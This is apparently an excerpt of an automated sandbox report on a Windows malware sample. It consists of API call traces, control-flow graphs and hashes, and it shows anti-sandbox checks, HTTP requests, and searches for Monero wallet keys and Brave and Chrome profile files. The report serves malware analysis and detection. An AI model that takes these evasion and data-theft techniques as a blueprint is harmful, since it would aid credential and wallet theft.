                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: a21fccf02dae848b3369d95463e94c5cad8e0aa62fb007911b72e11e7a4a7b25
                            • Instruction ID: 9a5b8b89512b6e8ff77ab3ad7265de6f53b491e0a528f2ddbd3f8b10c6014404
                            • Opcode Fuzzy Hash: a21fccf02dae848b3369d95463e94c5cad8e0aa62fb007911b72e11e7a4a7b25
                            • Instruction Fuzzy Hash: 59310E71900208AADB14F7A0E957FEE77B8AF44344F44652CF152B2181DF766906C7A6

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 eb1220-eb1247 call ec89b0 GlobalMemoryStatusEx 1439 eb1249-eb1271 call ecda00 * 2 1436->1439 1440 eb1273-eb127a 1436->1440 1442 eb1281-eb1285 1439->1442 1440->1442 1444 eb129a-eb129d 1442->1444 1445 eb1287 1442->1445 1447 eb1289-eb1290 1445->1447 1448 eb1292-eb1294 ExitProcess 1445->1448 1447->1444 1447->1448
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EB123E
                            • __aulldiv.LIBCMT ref: 00EB1258
                            • __aulldiv.LIBCMT ref: 00EB1266
                            • ExitProcess.KERNEL32 ref: 00EB1294
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 1cd61bcf0ae7434bb78dc9603fcece12ff3f386902183a82b7ef4fa8ee7e72ab
                            • Instruction ID: 6e82f593510332252ff446f41974e9365c51503808b374279c4e3ad64fee0c0c
                            • Opcode Fuzzy Hash: 1cd61bcf0ae7434bb78dc9603fcece12ff3f386902183a82b7ef4fa8ee7e72ab
                            • Instruction Fuzzy Hash: BB014BB0A44308EAEB10DBE0CD4ABEEBBB8AB04715F609498E705B6280D67566419799

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 ec6af3 1451 ec6b0a 1450->1451 1453 ec6b0c-ec6b22 call ec6920 call ec5b10 CloseHandle ExitProcess 1451->1453 1454 ec6aba-ec6ad7 call ecaad0 OpenEventA 1451->1454 1460 ec6ad9-ec6af1 call ecaad0 CreateEventA 1454->1460 1461 ec6af5-ec6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A98AC8,?,00ED110C,?,00000000,?,00ED1110,?,00000000,00ED0AEF), ref: 00EC6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EC6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00EC6AF9
                            • Sleep.KERNEL32(00001770), ref: 00EC6B04
                            • CloseHandle.KERNEL32(?,00000000,?,00A98AC8,?,00ED110C,?,00000000,?,00ED1110,?,00000000,00ED0AEF), ref: 00EC6B1A
                            • ExitProcess.KERNEL32 ref: 00EC6B22
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: c49c864e2b71e5fdcbea44144aa788c18bf8e8409e9de45708ef92bdd1d3c777
                            • Instruction ID: 49976c30c7ad77086ffd1cb4bb566a3b38c7004e267bf754c189ad94efa3d395
                            • Opcode Fuzzy Hash: c49c864e2b71e5fdcbea44144aa788c18bf8e8409e9de45708ef92bdd1d3c777
                            • Instruction Fuzzy Hash: 04F03070A40209EEEB20ABA09E06FBE7B74FB04705F10551CB517B2581DBB66942D755

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: c957ea2554e194c302a0f69bfbb6deed307534c572acf014cace44ce6b845c64
                            • Instruction ID: 94168a0a254453b844b2fa873e6a50567430bc0fc4a139e0d71d958b31b7aac7
                            • Opcode Fuzzy Hash: c957ea2554e194c302a0f69bfbb6deed307534c572acf014cace44ce6b845c64
                            • Instruction Fuzzy Hash: 4E2150B1D00208ABDF14DFA5E945BDE7778FB45320F108629F515B7280DB706609CB91

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB6280: InternetOpenA.WININET(00ED0DFE,00000001,00000000,00000000,00000000), ref: 00EB62E1
                              • Part of subcall function 00EB6280: StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6303
                              • Part of subcall function 00EB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB6335
                              • Part of subcall function 00EB6280: HttpOpenRequestA.WININET(00000000,GET,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB6385
                              • Part of subcall function 00EB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EB63BF
                              • Part of subcall function 00EB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB63D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EC5228
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: f622ca370170bbb9e804c7de426c8a02b859bd25e750b068cc24674df61578bb
                            • Instruction ID: 2a106d06bdc592de43df52cbd73f03d6231eaa2143447ce1e24071de5ebef5d5
                            • Opcode Fuzzy Hash: f622ca370170bbb9e804c7de426c8a02b859bd25e750b068cc24674df61578bb
                            • Instruction Fuzzy Hash: 2B110D3190010CA7CB18FF60DA56FED73B8AF50304F84616CF81A6A592EF366B07C691
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EB112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EB1132
                            • ExitProcess.KERNEL32 ref: 00EB1143
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 1b08f5bbb2931c77a919a0679a7fbff0cda40ec33e00184d11034f9ad88f44a5
                            • Instruction ID: c60edee57d392d09762260224c3b967789038c6a714eabe74a85a0d8d7a2c48d
                            • Opcode Fuzzy Hash: 1b08f5bbb2931c77a919a0679a7fbff0cda40ec33e00184d11034f9ad88f44a5
                            • Instruction Fuzzy Hash: 09E08670A45308FFE7206BA0DC0BB4976B8AB04B11F500088F70D775C4C6F926019B98
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EB10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EB10F7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 4dea9a0f7732a2e55a8271f89cfc7dbc903520804ff884d9862dcb30bd69acfc
                            • Instruction ID: 267e47a46f6c26110389a8597bd1a74adfe4ea7802968920f45963ee790a203d
                            • Opcode Fuzzy Hash: 4dea9a0f7732a2e55a8271f89cfc7dbc903520804ff884d9862dcb30bd69acfc
                            • Instruction Fuzzy Hash: 29F0E271641308BBE714AAA4AD5AFABB7E8E705B25F301448F548E3280D572AE00CBA0
                            APIs
                              • Part of subcall function 00EC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7910
                              • Part of subcall function 00EC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EC7917
                              • Part of subcall function 00EC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EC792F
                              • Part of subcall function 00EC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EB11B7), ref: 00EC7880
                              • Part of subcall function 00EC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EC7887
                              • Part of subcall function 00EC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EC789F
                            • ExitProcess.KERNEL32 ref: 00EB11C6
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 457370352881d1aab45a1a7373ffda29c67279effb7665c37bccc9de3cdf42ae
                            • Instruction ID: ee1d8b6c851909b2092d41c57bd5a08e9635698c7b6948f2352936b5cd5151e8
                            • Opcode Fuzzy Hash: 457370352881d1aab45a1a7373ffda29c67279effb7665c37bccc9de3cdf42ae
                            • Instruction Fuzzy Hash: 73E012B6A1431197DA5473B5AF1BF2B32DC5B14749F04242CFA49F7602FA2BF8018A65
                            APIs
                            • wsprintfA.USER32 ref: 00EC38CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EC38E3
                            • lstrcat.KERNEL32(?,?), ref: 00EC3935
                            • StrCmpCA.SHLWAPI(?,00ED0F70), ref: 00EC3947
                            • StrCmpCA.SHLWAPI(?,00ED0F74), ref: 00EC395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC3C67
                            • FindClose.KERNEL32(000000FF), ref: 00EC3C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 93e31b089afffb10d5da67b4a56fd02b69f2b5227fefe9beeae3890702626899
                            • Instruction ID: 23632c789fae6029f5410ee3cbfc7cd46f0691b6900c406a0b151831bc686440
                            • Opcode Fuzzy Hash: 93e31b089afffb10d5da67b4a56fd02b69f2b5227fefe9beeae3890702626899
                            • Instruction Fuzzy Hash: E2A130B1A002089BDB34DB64DD89FEE73B8FB88300F04858DA54DA7545EB769B85CF61
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • FindFirstFileA.KERNEL32(00000000,?,00ED0B32,00ED0B2B,00000000,?,?,?,00ED13F4,00ED0B2A), ref: 00EBBEF5
                            • StrCmpCA.SHLWAPI(?,00ED13F8), ref: 00EBBF4D
                            • StrCmpCA.SHLWAPI(?,00ED13FC), ref: 00EBBF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EBC7BF
                            • FindClose.KERNEL32(000000FF), ref: 00EBC7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: f0c62f1382e7ec30671546aaed4e8df5de9543a4688a0f0d8c63a7f8b7c940ec
                            • Instruction ID: 0d8ef30172702d7795a6f929c81e80a5e15f35b45ac98947b6556ed543259cbd
                            • Opcode Fuzzy Hash: f0c62f1382e7ec30671546aaed4e8df5de9543a4688a0f0d8c63a7f8b7c940ec
                            • Instruction Fuzzy Hash: 06425672900108ABCB14FB70DE56FEE73BDAB84304F44556DB50AB6181EE359F4ACB92
                            APIs
                            • wsprintfA.USER32 ref: 00EC492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00EC4943
                            • StrCmpCA.SHLWAPI(?,00ED0FDC), ref: 00EC4971
                            • StrCmpCA.SHLWAPI(?,00ED0FE0), ref: 00EC4987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC4B7D
                            • FindClose.KERNEL32(000000FF), ref: 00EC4B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
